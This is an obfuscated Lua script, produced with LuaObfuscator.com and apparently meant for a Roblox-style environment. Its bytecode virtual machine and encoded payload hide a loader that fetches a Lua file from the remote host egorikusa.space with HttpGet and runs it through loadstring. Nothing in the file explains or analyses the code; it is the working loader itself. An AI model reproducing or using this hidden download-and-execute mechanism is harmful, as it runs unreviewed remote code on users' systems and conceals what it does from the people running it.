--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v111=0;local v112;while true do if (v111==1) then return v112;end if (v111==0) then v112=v5(v89,v19);v19=nil;v111=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((570 -(367 + 201))^(v32-(2 -(4 -3)))))%((5 -3)^(((v33-(1 -(117 -(32 + 85)))) -(v32-(878 -(282 + 595)))) + 1)) ;return v90-(v90%(1638 -(1523 + 114))) ;else local v91=(2 + 0 + 0)^(v32-(2 -1)) ;return (((v31%(v91 + v91))>=v91) and ((138 + 482) -(555 + 64))) or (931 -(857 + 74)) ;end end local function v21() local v34=957 -(892 + 65) ;local v35;while true do if (v34==(2 -1)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + ((181 -(67 + 113)) -(0 + 0)) ;v34=351 -(87 + (645 -382)) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -5) ;return (v37 * (1208 -(802 + 150))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + ((28 -18) -6) ;return (v41 * (30433252 -13656036)) + (v40 * (47703 + 17833)) + (v39 * (1253 -(915 + 48 + 34))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,(468 + 720) -(1069 + 118) ,7 + (44 -31) ) * ((4 -2)^(804 -(201 + 571)))) + v42 ;local v46=v20(v43,45 -(1771 -(760 + 987)) ,128 -97 );local v47=((v20(v43,6 + 26 )==(1 -(1913 -(1789 + 124)))) and  -((769 -(745 + 21)) -2)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(791 -(368 + 423))) then return v47 * (0 -0) ;else v46=886 -(261 + 624) ;v44=(7 + 11) -(10 + 8) ;end elseif (v46==(7874 -5827)) then return ((v45==(442 -((1144 -728) + 26))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((1725 -1285) + 5 + 578) ) * (v44 + (v45/((3 -1)^((385 + 105) -(145 + 293))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(1055 -(87 + 968))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v66=1 + 0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 574 -(507 + 67) ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do local v110=(function() return 0;end)();while true do if (v110==(1749 -(1013 + 736))) then if (v101==1) then local v120=(function() return 0 + 0 ;end)();while true do if (v120==(0 -0)) then while true do if (v92==(0 -0)) then v93=(function() return v94();end)();if (v95(v93, #"}", #">")==(867 -(550 + 317))) then local v169=(function() return 0 -0 ;end)();local v170=(function() return;end)();local v171=(function() return;end)();local v172=(function() return;end)();while true do if (v169~=(0 -0)) then else local v173=(function() return 0;end)();while true do if (v173~=(2 -1)) then else v169=(function() return 1;end)();break;end if (0~=v173) then else v170=(function() return v95(v93,2, #"asd");end)();v171=(function() return v95(v93, #"?id=",291 -(134 + 151) );end)();v173=(function() return 1;end)();end end end if (v169~=(1666 -(970 + 695))) then else local v174=(function() return 0 -0 ;end)();while true do if (v174==1) then v169=(function() return 1992 -(582 + 1408) ;end)();break;end if (v174==(0 -0)) then v172=(function() return {v96(),v96(),nil,nil};end)();if (v170==(0 -0)) then local v179=(function() return 0;end)();while true do if (0~=v179) then else v172[ #"19("]=(function() return v96();end)();v172[ #".dev"]=(function() return v96();end)();break;end end elseif (v170== #"~") then v172[ #"19("]=(function() return v97();end)();elseif (v170==2) then v172[ #"nil"]=(function() return v97() -((1826 -(1195 + 629))^16) ;end)();elseif (v170== #"-19") then local v184=(function() return 0 -0 ;end)();while true do if (0~=v184) then else v172[ #"-19"]=(function() return v97() -(2^16) ;end)();v172[ #".com"]=(function() return v96();end)();break;end end end v174=(function() return 242 -(187 + 54) ;end)();end end end if (v169~=(783 -(162 + 618))) then else if (v95(v171, #"-19", #"xnx")~= #"\\") then else v172[ #"asd1"]=(function() return v98[v172[ #".dev"]];end)();end v99[v100]=(function() return v172;end)();break;end if (v169~=(2 + 0)) then else if (v95(v171, #" ", #">")== #"[") then v172[2]=(function() return v98[v172[2]];end)();end if (v95(v171,2 + 0 ,3 -1 )~= #"[") then else v172[ #"19("]=(function() return v98[v172[ #"nil"]];end)();end v169=(function() return 3;end)();end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end if (v101==(0 -0)) then v92=(function() return 0 + 0 ;end)();v93=(function() return nil;end)();v101=(function() return 1637 -(1373 + 263) ;end)();end break;end end end end;end)();local v52=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if (v105==0) then v106=(function() return 1000 -(451 + 549) ;end)();while true do if (v106==(0 + 0)) then local v121=(function() return 0 -0 ;end)();local v122=(function() return;end)();while true do if (v121~=0) then else v122=(function() return 0 -0 ;end)();while true do if (0==v122) then v102[v103-#"[" ]=(function() return v104();end)();return v102,v103,v104;end end break;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"<",v57 do local v69=(function() return 1384 -(746 + 638) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if ((0 + 0)~=v69) then else v70=(function() return 0;end)();v71=(function() return nil;end)();v69=(function() return 1;end)();end if (1==v69) then v72=(function() return nil;end)();while true do if (v70~=0) then else local v117=(function() return 0 -0 ;end)();local v118=(function() return;end)();while true do if (v117~=0) then else v118=(function() return 0;end)();while true do if (v118==1) then v70=(function() return 1;end)();break;end if (v118==(341 -(218 + 123))) then v71=(function() return v21();end)();v72=(function() return nil;end)();v118=(function() return 1;end)();end end break;end end end if (v70==(1582 -(1535 + 46))) then if (v71== #".") then v72=(function() return v21()~=(0 + 0) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"nil") then else v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end end end v56[ #"xnx"]=(function() return v21();end)();for v73= #":",v23() do FlatIdent_1743D,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_1743D,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #".",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[562 -(306 + 254) ];local v65=v60[1 + 2 ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1 -0 ;local v80= -(1468 -(521 + 378 + 358 + 210));local v81={};local v82={...};local v83=v12("#",...) -(2 -(1 + 0)) ;local v84={};local v85={};for v107=0,v83 do if (v107>=v77) then v81[v107-v77 ]=v82[v107 + (604 -(268 + 335)) ];else v85[v107]=v82[v107 + 1 ];end end local v86=(v83-v77) + (291 -(60 + 230)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1];if ((2874>=2709) and (v88<=(579 -(426 + 146)))) then if (v88<=(1 + 2)) then if ((343==343) and (v88<=(1457 -(282 + 1174)))) then if ((v88>(811 -(569 + (368 -(116 + 10))))) or (4182==1869)) then v85[v87[5 -3 ]]=v87[1 + 2 ];else v85[v87[1026 -(706 + 318) ]]=v62[v87[3]];end elseif (v88==2) then v85[v87[1253 -(721 + 530) ]]=v87[1274 -(945 + 326) ];else v85[v87[4 -(1 + 1) ]]=v87[3 + 0 ]~=(700 -(271 + 429)) ;end elseif (v88<=((743 -(542 + 196)) + 0)) then if (v88>(1504 -(1408 + 92))) then v85[v87[2]]();else v85[v87[1088 -(461 + 625) ]]();end elseif (v88>(1294 -(993 + (632 -337)))) then local v130=0 + 0 ;local v131;local v132;while true do if (0==v130) then v131=v87[1173 -(418 + 753) ];v132=v85[v87[2 + 1 ]];v130=1 + 0 ;end if (v130==(1 + 0)) then v85[v131 + 1 + 0 + 0 ]=v132;v85[v131]=v132[v87[533 -(406 + 123) ]];break;end end else local v133=v87[1771 -(1749 + 20) ];v85[v133]=v85[v133](v13(v85,v133 + 1 + 0 ,v80));end elseif ((4630==4630) and (v88<=(1333 -(1249 + 73)))) then if ((v88<=(4 + 5)) or (4239<=3546)) then if (v88>(1153 -(466 + 679))) then do return;end else v85[v87[4 -2 ]]=v87[8 -5 ]~=(1900 -(106 + 912 + 882)) ;end elseif (v88>(2 + 2 + 6)) then local v136=v87[1 + 1 ];local v137=v85[v87[8 -5 ]];v85[v136 + (2 -1) ]=v137;v85[v136]=v137[v87[118 -(4 + 110) ]];else local v141=(1538 -954) -(57 + 527) ;local v142;local v143;local v144;local v145;while true do if ((1429 -(41 + 1386))==v141) then for v166=v142,v80 do v145=v145 + (104 -(17 + 86)) ;v85[v166]=v143[v145];end break;end if ((1 + 0)==v141) then v80=(v144 + v142) -(1 -0) ;v145=0 -0 ;v141=168 -(122 + 44) ;end if (v141==(0 -0)) then v142=v87[6 -4 ];v143,v144=v78(v85[v142](v13(v85,v142 + 1 + 0 ,v87[1 + 2 ])));v141=1;end end end elseif ((v88<=((66 -40) -13)) or (3244<=2821)) then if (v88==(77 -(30 + (1586 -(1126 + 425))))) then local v146=v87[2 + (405 -(118 + 287)) ];local v147,v148=v78(v85[v146](v13(v85,v146 + (1258 -(1043 + 214)) ,v87[11 -8 ])));v80=(v148 + v146) -((4753 -3540) -(323 + 889)) ;local v149=0;for v154=v146,v80 do v149=v149 + (2 -1) ;v85[v154]=v147[v149];end else do return;end end elseif ((2996>=2654) and (v88>(594 -(361 + 219)))) then local v150=320 -((1174 -(118 + 1003)) + 267) ;local v151;while true do if (v150==(0 + 0)) then v151=v87[5 -3 ];v85[v151]=v85[v151](v13(v85,v151 + (414 -(15 + (775 -(142 + 235)))) ,v80));break;end end else v85[v87[2]]=v62[v87[985 -(18 + (4373 -3409)) ]];end v79=v79 + (3 -2) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F666135306661306338353166613637333130633662662Q312E6C756100093Q00124Q00013Q00122Q000100023Q00200B000100010003001202000300044Q0008000400014Q000C000100044Q000F5Q00022Q00043Q000100012Q000D3Q00017Q00",v9(),...);
